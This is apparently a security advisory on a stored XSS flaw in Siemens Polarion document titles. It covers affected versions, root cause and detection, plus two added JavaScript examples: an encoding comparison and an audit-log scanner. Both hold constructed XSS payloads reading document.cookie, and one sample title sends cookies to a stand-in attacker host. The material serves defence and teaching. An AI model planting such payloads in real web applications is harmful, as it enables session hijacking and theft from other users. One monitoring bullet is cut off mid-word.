Security News

Severity: MEDIUM | Categories: Vulnerabilities, Web, Discovery

CVE-2025-40587: Polarion Stored XSS Vulnerability

  • What: A stored cross-site scripting (XSS) vulnerability has been identified in Siemens Polarion application lifecycle management software.
  • Impact: Authenticated attackers can inject malicious JavaScript into document titles, which executes in the browsers of other users viewing those documents.

CVE-2025-40587 is a stored XSS vulnerability in Polarion V2404 and V2410 that allows authenticated attackers to inject malicious JavaScript into document titles. This article covers technical details, affected versions, and mitigations.

Published: February 13, 2026

CVE-2025-40587 Overview

A stored cross-site scripting (XSS) vulnerability has been identified in Siemens Polarion application lifecycle management software. The affected application allows arbitrary JavaScript code to be included in document titles. This could allow an authenticated remote attacker to conduct a stored cross-site scripting attack by creating specially crafted document titles that are later viewed by other users of the application.

Impact

Authenticated attackers can inject malicious JavaScript into document titles, which executes in the browsers of other users viewing those documents. This can lead to session hijacking (where session tokens are readable from script), credential theft through injected forms, and unauthorized actions performed with the victim's privileges.

Affected Products

  • Polarion V2404 (all versions prior to V2404.5)
  • Polarion V2410 (all versions prior to V2410.2)

Discovery Timeline

  • 2026-02-10 - CVE-2025-40587 published to NVD
  • 2026-02-10 - Last updated in NVD database

Technical Details for CVE-2025-40587

Vulnerability Analysis

This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as cross-site scripting. The flaw exists in the document title handling mechanism within Siemens Polarion, where user-supplied input is not encoded for the HTML context in which it is rendered in the application interface. In a stored XSS scenario like this one, the malicious payload persists in the application's database. When other authenticated users navigate to pages displaying the crafted document title, the injected JavaScript executes within their browser context.
This attack requires the attacker to hold valid credentials with permission to create or modify document titles, but the impact extends to any user who subsequently views the poisoned content. The attack is network-based and of low complexity, so it is within reach of any authenticated user with document creation or editing privileges. The downstream impact is significant because the injected script runs with the full privileges of the victim's authenticated session.

Root Cause

The root cause is missing output encoding, compounded by insufficient input validation, in the document title handling functionality. When document titles are stored and later rendered in the web interface, the application fails to encode the characters that a browser interprets as HTML or JavaScript. This lets an attacker inject script elements or event-handler attributes that execute when the title is displayed to other users. The durable fix is to encode the title at the point of output for the context it lands in (element text, attribute value), rather than to strip known-bad patterns on the way in.

Attack Vector

The attack is executed over the network by an authenticated user. The attacker creates a new document, or modifies an existing one, with a title that carries JavaScript. The crafted title is stored in the Polarion database. When other users browse document listings, search results, or any other view that renders the title, the injected script executes in their browser. Typical payloads steal session cookies, redirect users to phishing pages, perform actions on the victim's behalf, or exfiltrate data from the application interface. Because this is stored XSS, the attack persists until the malicious document title is cleaned or removed, so it can affect many users over time.
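The encoding failure described under Root Cause, shown as an added example that is not Polarion code and is not taken from the Siemens advisory. Four title-handling strategies (pass-through, a script-tag blocklist, angle-bracket-only encoding, and full HTML encoding) are applied to constructed payloads rendered into a listing row that shows the title both as a tooltip attribute and as cell text; a small tokenizer that tracks tag and quoted-attribute state then reports whether anything executable survived. The row template, payloads and function names are assumptions for the demonstration.

```javascript
// Added example, not Polarion code: why a <script> blocklist or angle-bracket-only
// encoding does not close a stored-XSS hole in a document title, and what full
// output encoding looks like. Payloads and the row template are constructed.

const PAYLOAD_EVENT_HANDLER = 'Release plan <img src=x onerror="alert(document.cookie)">';
const PAYLOAD_ATTR_BREAKOUT = 'Release plan" onmouseover="alert(document.cookie)';
const PAYLOAD_SCRIPT_TAG    = 'Release plan <script>alert(document.cookie)</script>';

// 0. Baseline: title rendered exactly as stored (the CWE-79 condition).
function asIs(title) {
  return title;
}

// 1. Blocklist: remove <script> elements and nothing else.
function filterScriptTags(title) {
  return title.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '');
}

// 2. Partial encoding: angle brackets only. Enough for text nodes, not for
//    attribute values, because a quote in the title can end the attribute early.
function encodeAngleBrackets(title) {
  return title.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// 3. Full HTML encoding: safe for text nodes and for quoted attribute values.
function encodeHtml(title) {
  return String(title)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// A listing row (assumed template) that shows the title twice: as a tooltip
// attribute and as cell text. Whatever handling is chosen must hold in both.
function renderListingRow(title, handle) {
  const t = handle(title);
  return `<tr><td title="${t}">${t}</td></tr>`;
}

// Approximates the browser's question "did anything executable get parsed?":
// walks the markup tracking tag and quoted-attribute state, and reports a
// <script> element or an on* attribute name that sits outside a quoted value.
function hasExecutableMarkup(html) {
  let inTag = false, expectName = false, quote = null, token = '';
  const endToken = () => {
    if (expectName) { expectName = false; return token.toLowerCase() === 'script'; }
    return /^on[a-z]+$/i.test(token);
  };
  for (const ch of html) {
    if (!inTag) {
      if (ch === '<') { inTag = true; expectName = true; token = ''; }
      continue;
    }
    if (quote) { if (ch === quote) quote = null; continue; }
    if (ch === '"' || ch === "'") { quote = ch; token = ''; continue; }
    if (ch === '>' || ch === '=' || /\s/.test(ch)) {
      if (endToken()) return true;
      token = '';
      if (ch === '>') inTag = false;
      continue;
    }
    token += ch;
  }
  return false;
}

// Matrix: for each payload and handling strategy, is the rendered row still live?
function evaluateHandling() {
  const payloads = { eventHandler: PAYLOAD_EVENT_HANDLER, attrBreakout: PAYLOAD_ATTR_BREAKOUT, scriptTag: PAYLOAD_SCRIPT_TAG };
  const strategies = { asIs, filterScriptTags, encodeAngleBrackets, encodeHtml };
  const result = {};
  for (const [p, payload] of Object.entries(payloads)) {
    result[p] = {};
    for (const [s, handle] of Object.entries(strategies)) {
      result[p][s] = hasExecutableMarkup(renderListingRow(payload, handle));
    }
  }
  return result;
}

console.log(JSON.stringify(evaluateHandling(), null, 2));
```

Only the full-encoding column is false for every payload: the blocklist stops the one pattern it was written for and nothing else, and angle-bracket encoding is defeated by a bare quote once the title is also placed in an attribute. Encoding at output time, per context, is the property to verify when reviewing a fix rather than the presence of a filter on input.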
Detection Methods for CVE-2025-40587

Indicators of Compromise

  • Document titles containing HTML tags, JavaScript event handlers (e.g., onerror, onload, onclick), or <script> elements
  • Unusual browser behavior or unexpected redirects when viewing document listings in Polarion
  • Audit log entries showing document title modifications with suspicious encoded characters or script-like content
  • Reports from users about unexpected popups, prompts, or authentication requests while using Polarion

Detection Strategies

  • Implement web application firewall (WAF) rules to detect XSS patterns in HTTP requests targeting document creation and modification endpoints (a compensating control only; the affected-version list above implies V2404.5 and V2410.2 as the fixed releases)
  • Enable detailed audit logging for all document title creation and modification events
  • Deploy browser-based XSS detection mechanisms through Content Security Policy (CSP) violation reporting
  • Perform regular database scans to identify document titles containing script tags or JavaScript event handlers, decoding HTML entities and percent-encoding before matching so that encoded payloads are not missed

Monitoring Recommendations

  • Monitor Polarion application logs for unusual patterns in document title content, particularly encoded HTML entities or script-related keywords
  • Configure SIEM alerting for multiple rapid document title changes from a single user account
  • Review CSP violation reports for blocked inline script execution attempts
  • Conduct periodic security assessments to identify stored XSS paylo
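The database scan and the rapid-change alert listed above, as an added example that is not a Polarion feature or a vendor-supplied script. It runs over constructed audit records (the fields ts, user, doc and title are assumed), decodes HTML entities and percent-encoding before matching so that the encoded payloads the Monitoring Recommendations mention are caught, and flags any account that changed several titles inside a short sliding window. The check patterns are deliberately written so that ordinary titles containing "<" or words beginning with "on" are not reported.

```javascript
// Added example, not a Polarion feature: offline review of document-title
// audit records for (a) titles carrying markup or script constructs, checked
// after undoing HTML-entity and percent encoding, and (b) one account changing
// many titles in a short window. Records and field names are constructed.

const AUDIT_RECORDS = [
  { ts: '2026-02-11T09:00:05Z', user: 'alice',   doc: 'DOC-101', title: 'Q2 release notes' },
  { ts: '2026-02-11T09:02:10Z', user: 'mallory', doc: 'DOC-204', title: 'Review <img src=x onerror=alert(document.cookie)>' },
  { ts: '2026-02-11T09:02:31Z', user: 'mallory', doc: 'DOC-205', title: 'Specs &lt;svg onload=fetch(&quot;//attacker.example/?c=&quot;+document.cookie)&gt;' },
  { ts: '2026-02-11T09:02:58Z', user: 'mallory', doc: 'DOC-206', title: 'Plan %3Cscript%3Ealert(1)%3C%2Fscript%3E' },
  { ts: '2026-02-11T09:03:20Z', user: 'mallory', doc: 'DOC-207', title: 'Roadmap <a href="javascript:alert(1)">link</a>' },
  { ts: '2026-02-11T10:15:00Z', user: 'bob',     doc: 'DOC-301', title: 'Tickets with priority > 3 and < 7' },
  { ts: '2026-02-11T10:16:00Z', user: 'bob',     doc: 'DOC-302', title: 'Onboarding checklist' },
];

// Undo the named and numeric entities an attacker might use to hide '<' or '"'
// from a naive scan. Unknown entity names are left untouched.
const NAMED_ENTITIES = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
function decodeEntities(s) {
  return s.replace(/&(#x([0-9a-f]+)|#(\d+)|([a-z]+));/gi, (m, _all, hex, dec, name) => {
    if (hex || dec) {
      const cp = hex ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    const v = NAMED_ENTITIES[name.toLowerCase()];
    return v === undefined ? m : v;
  });
}

// Percent decoding; a title with a stray '%' is not an error, it is left as-is.
function decodePercent(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Apply both decoders repeatedly (bounded) so double-encoded payloads normalize.
function normalizeTitle(title) {
  let cur = title;
  for (let i = 0; i < 3; i++) {
    const next = decodePercent(decodeEntities(cur));
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// What "script-like content" looks like once decoded. The tag check requires a
// letter after '<' so "priority < 7" is not flagged, and the handler check
// requires '=' so the word "Onboarding" is not flagged.
const CHECKS = [
  ['html-tag',       /<\s*\/?\s*[a-z][\w-]*/i],
  ['script-element', /<\s*script\b/i],
  ['event-handler',  /\bon[a-z]+\s*=/i],
  ['javascript-uri', /javascript\s*:/i],
];

function scanTitle(title) {
  const decoded = normalizeTitle(title);
  const reasons = CHECKS.filter(([, re]) => re.test(decoded)).map(([name]) => name);
  return { decoded, reasons };
}

// Findings for every record whose decoded title trips at least one check.
function scanRecords(records) {
  return records.flatMap((r) => {
    const { decoded, reasons } = scanTitle(r.title);
    return reasons.length ? [{ doc: r.doc, user: r.user, reasons, decoded }] : [];
  });
}

// Users who changed `threshold` or more titles inside any `windowMs` sliding window.
function burstyEditors(records, { windowMs = 5 * 60 * 1000, threshold = 3 } = {}) {
  const byUser = new Map();
  for (const r of records) {
    if (!byUser.has(r.user)) byUser.set(r.user, []);
    byUser.get(r.user).push(Date.parse(r.ts));
  }
  const flagged = [];
  for (const [user, times] of byUser) {
    times.sort((a, b) => a - b);
    let start = 0;
    for (let end = 0; end < times.length; end++) {
      while (times[end] - times[start] > windowMs) start++;
      if (end - start + 1 >= threshold) { flagged.push(user); break; }
    }
  }
  return flagged;
}

console.log(JSON.stringify({ findings: scanRecords(AUDIT_RECORDS), burstyEditors: burstyEditors(AUDIT_RECORDS) }, null, 2));
```

Run against a real export, the scan belongs on the stored titles (the database-scan item above) rather than only on inbound requests, because a payload that was written before a WAF rule existed is still live in every listing that renders it. The burst rule is a triage signal, not proof: a bulk rename by a legitimate user trips it too, so pair it with the content findings before acting.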
